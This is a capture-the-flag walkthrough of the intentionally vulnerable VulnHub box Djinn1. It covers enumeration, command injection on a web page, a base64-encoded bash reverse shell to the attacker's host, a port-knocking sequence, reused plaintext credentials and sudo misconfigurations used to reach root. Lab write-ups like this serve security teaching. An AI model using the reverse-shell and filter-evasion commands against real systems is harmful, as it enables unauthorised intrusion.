VulnHub: Djinn1 Walkthrough
Djinn 1 is another intentionally vulnerable box in the Djinn series on Vulnhub by 0xmzfr
Enumeration
Starting enumeration with AutoRecon.
Nmap scan report for 192.168.50.150
Host is up, received arp-response (0.0012s latency).
Scanned at 2021-12-30 06:44:55 EST for 14s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp filtered ssh port-unreach ttl 64
1337/tcp open waste? syn-ack ttl 64
7331/tcp open http syn-ack ttl 64 Werkzeug httpd 0.16.0 (Python 2.7.15+)
FTP has anonymous login allowed. Port 21 is filtered, quite possibly, port knocking could be involved.
Port 1337 has an unknown service accessbile through it, however, web server is available at port 7331.
Noting the service version, we move ahead.
Logging in as anonymous, there are three files:
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
┌──(root💀kali)-[~]
└─# cat creds.txt
nitu:81299
┌──(root💀kali)-[~]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
┌──(root💀kali)-[~]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
We found one username and credential and that port 1337 has a game.
Moving onto port 1337:
┌──(root💀kali)-[~]
└─# nc 192.168.50.150 1337
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(9, '*', 5)
> 45
(2, '*', 9)
> 18
(1, '-', 9)
> -8
(8, '+', 1)
> 9
(3, '+', 9)
> 12
There is an actual game, but it'll only reward something after 1000 correct answers. We don't have the time nor are we sure of the reward. We could write a bash script that could take care of arithmetic, but we'll leave it for now.
So, we move onto port 7331.
Nothing special with the first page, nor is there any unusual business in the source code. So we dirbust.
200 41l 91w 1676c http://192.168.50.150:7331/genie
200 21l 43w 385c http://192.168.50.150:7331/wish
This is interesting!
/genie has Error 403.
/wish has a command execution.
The results are redirected to /genie.
Initial Foothold
There is netcat on the system, we can try to get a reverse shell.
When trying nc -e /bin/bash 192.168.50.129 443 it throws an error.
Tried that with bash and python too but the same error. Looks like it doesn't accept certain characters and symbols.
So, we can try and encode the command in base64 and then decode it again.
We take the following bash script and encode it here .
bash -i >& /dev/tcp/192.168.50.129/443 0>&1
We then pass the following command:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS80NDMgMD4mMQ== | base64 -d | bash
This will first decode the base64 to ASCII and then pass it to bash to be executed.
Setup a listener on port 443 and then hit execute, we shall receive a shell back.
┌──(root💀kali)-[~]
└─# nc -nlvp 443 1 ⨯
listening on [any] 443 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.150] 36924
bash: cannot set terminal process group (659): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ whoami
whoami
www-data
There is a file in the current working directory called app.py containing something interesting.
www-data@djinn:/opt/80$ ls
ls
app.py
app.pyc
static
templates
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess
from flask import Flask, redirect, render_template, request, url_for
app = Flask(__name__)
app.secret_key = "key"
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]
--snip--
Looking at creds.txt, we find credentials for nitish.
www-data@djinn:/home/nitish/.dev$ cat creds.txt
cat creds.txt
nitish:p4ssw0rdStr3r0n9
We also saw, how port 22 was filtered, it was due to port knocking. knockd.conf is stored in /etc/. We'll take the sequence from there and open the port.
www-data@djinn:/home/nitish/.dev$ cat /etc/knockd.conf
cat /etc/knockd.conf
[options]
UseSyslog
[openSSH]
sequence = 1356, 6784, 3409
seq_timeout = 5
command = /sbin/iptables -I INPUT 1 -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 3409, 6784, 1356
seq_timeout = 5
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
Using knock utility in linux, we'll open port 22.
┌──(root💀kali)-[~]
└─# knock 192.168.50.150 1356 6784 3409
┌──(root💀kali)-[~]
└─# nmap 192.168.50.150 -p 22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-30 16:49 EST
Nmap scan report for 192.168.50.150
Host is up (0.015s latency).
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:BE:BF:E6 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds
Port 22 is open. We'll try the nitish creds that were found.
┌──(root💀kali)-[~]
└─# ssh nitish@192.168.50.150
The authenticity of host '192.168.50.150 (192.168.50.150)' can't be established.
ECDSA key fingerprint is SHA256:v2iGR6/ExHheYxy8lYISh+VaSM3sBf3DLY5MGWRpIu4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
--snip--
Last login: Thu Nov 14 20:32:20 2019 from 192.168.1.107
nitish@djinn:~$
We have a shell as Nitish.
nitish@djinn:~$ ls
user.txt
nitish@djinn:~$ cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
nitish@djinn:~$
Here's our user flag.
Lateral Movement
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
We can run genie as user sam without needing the password.
nitish@djinn:~$ sudo -u sam /usr/bin/genie wish
Pass your wish to GOD, he might be able to help you.
nitish@djinn:~$ sudo -u sam /usr/bin/genie -g wish
We've added your wish to our records.
Continue praying!!
nitish@djinn:~$ sudo -u sam /usr/bin/genie -cmd new
my man!!
$ whoami
sam
After a bit of trial and error, we got shell as SAM.
Privilege Escalation
$ sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
We can execute a file with root privileges.
$ sudo /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
Choose a number between 1 to 100:
Enter your number: num
# whoami
root
Options 1, 3, and 4 have a hardcoded output, you can only fiddle around with option 2. Be creative. After a bit of trial and error, we beat the script and get root.
# cat proof.sh
#!/bin/bash
clear
figlet Amazing!!!
echo djinn pwned...
echo __________________________________________________________________________
echo
echo "Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc"
echo Path: $(pwd)
echo Date: $(date)
echo Whoami: $(whoami)
echo __________________________________________________________________________
echo
echo "By @0xmzfr"
echo ""
echo "Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)"
And here's our root flag too.
Thanks for reading.
